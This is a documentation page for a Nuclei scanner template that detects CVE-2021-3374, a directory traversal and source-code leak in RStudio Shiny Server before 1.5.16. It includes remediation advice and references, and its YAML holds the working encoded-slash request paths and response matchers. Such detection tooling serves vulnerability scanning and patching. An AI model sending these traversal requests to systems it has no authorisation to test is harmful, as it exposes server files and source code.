Rstudio Shiny Server <1.5.16 - Local File Inclusion
ID: CVE-2021-3374
Severity: medium
Author: geeknik
Tags: cve2021,cve,rstudio,traversal
Description
Section titled “Description”Rstudio Shiny Server prior to 1.5.16 is vulnerable to local file inclusion and source code leakage. This can be exploited by appending an encoded slash to the URL.
YAML Source
Section titled “YAML Source”id: CVE-2021-3374
info: name: Rstudio Shiny Server <1.5.16 - Local File Inclusion author: geeknik severity: medium description: Rstudio Shiny Server prior to 1.5.16 is vulnerable to local file inclusion and source code leakage. This can be exploited by appending an encoded slash to the URL. impact: | Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server, potentially exposing sensitive information. remediation: | Upgrade Rstudio Shiny Server to version 1.5.16 or later to mitigate the vulnerability. reference: - https://github.com/colemanjp/shinyserver-directory-traversal-source-code-leak - https://blog.rstudio.com/2021/01/13/shiny-server-1-5-16-update/ - https://nvd.nist.gov/vuln/detail/CVE-2021-3374 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2021-3374 cwe-id: CWE-22 epss-score: 0.00235 epss-percentile: 0.61494 cpe: cpe:2.3:a:rstudio:shiny_server:*:*:*:*:pro:*:*:* metadata: max-request: 2 vendor: rstudio product: shiny_server tags: cve2021,cve,rstudio,traversal
http: - method: GET path: - "{{BaseURL}}/%2f/" - "{{BaseURL}}/sample-apps/hello/%2f/"
matchers-condition: and matchers: - type: word words: - "Index of /"
- type: regex part: body regex: - "[A-Za-z].*\\.R"
- type: status status: - 200# digest: 4a0a0047304502205c1c1d0ef0eecb9956ffca80911e585954b5828addce39f53f2378235d5e587c022100c0d067075c7734ae3441d9bfcc62c8a9b69058731e5eb1db74280d845800737b:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-3374.yaml"